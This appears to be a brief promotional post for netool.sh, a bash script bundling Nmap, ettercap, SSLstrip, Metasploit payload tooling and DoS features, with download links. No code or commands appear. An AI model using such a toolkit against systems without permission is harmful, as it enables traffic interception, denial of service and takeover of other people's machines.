netool.sh is a script in bash to automate frameworks like Nmap,Driftnet,SSLstrip, and ettercap MITM attacks, Retrieves
metadata, geo-location of target, changes hostname, change IP
and Mac-Address to decoy scans, search for admin login page
on taget website, search for directorys inside target website,
search for webshells.php planted on website and scan Common
URL File Upload vulns, also capture pictures of web-browser surfing of the target machine, perform TCP/UDP packets manipulation using
etter.filters, DoS attacks local/external network,also uses metasploit [msfpayload+msfencode+msfcli] to gain control of target machine ...
Home project:
https://sourceforge.net/projects/netoolsh/?source=navbar
See My WIKI : http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/
Download Tool:
https://sourceforge.net/projects/netoolsh/files/latest/download?source=navbar
-----------------------------------
Enjoy, and safe hacking ...
Say him Thanks, by clicking here